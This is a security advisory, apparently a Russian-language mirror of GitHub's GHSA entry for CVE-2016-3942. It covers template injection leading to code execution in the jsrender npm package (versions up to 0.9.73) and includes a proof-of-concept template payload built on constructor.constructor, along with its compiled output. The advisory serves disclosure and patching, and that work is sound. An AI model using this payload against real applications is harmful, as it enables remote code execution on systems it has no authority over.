GHSA-r87w-47m8-22w3

Опубликовано: 01 сент. 2020

Источник: github

Github: Прошло ревью

CVSS3: 6.3

Описание

Template Injection in jsrender

Affected versions of jsrender are susceptible to a remote code execution vulnerability when used with server delivered client-side tempates which dynamically embed user input.

Proof of Concept

//POC-REQUEST {{for ~x!=1?(constructor.constructor("return arguments.callee.caller")()):~y(10)}} {{:#data}} {{/for}}

//POC-RESPONSE function anonymous(data,view,j,u) { // template var v,t=j._tag,ret="" +t("for",view,this,[ {view:view,tmpl:1, params:{args:['~x!=1?(constructor.constructor(\"return arguments.callee.caller\")()):~y(10)']}, args:[view.hlp("x")!=1?(data.constructor.constructor("return arguments.callee.caller")()):view.hlp("y")(10)], props:{}}]); return ret; }

Recommendation

Update to version 0.9.74 or later.

Ссылки

Пакеты

Наименование

jsrender

npm

Затронутые версииВерсия исправления

<= 0.9.73

0.9.74

6.3 Medium

CVSS3

CVE ID

CVE-2016-3942

Дефекты

CWE-94

Связанные уязвимости

CVE-2016-3942

debian

Описание отсутствует

6.3 Medium

CVSS3

CVE ID

CVE-2016-3942

Дефекты

CWE-94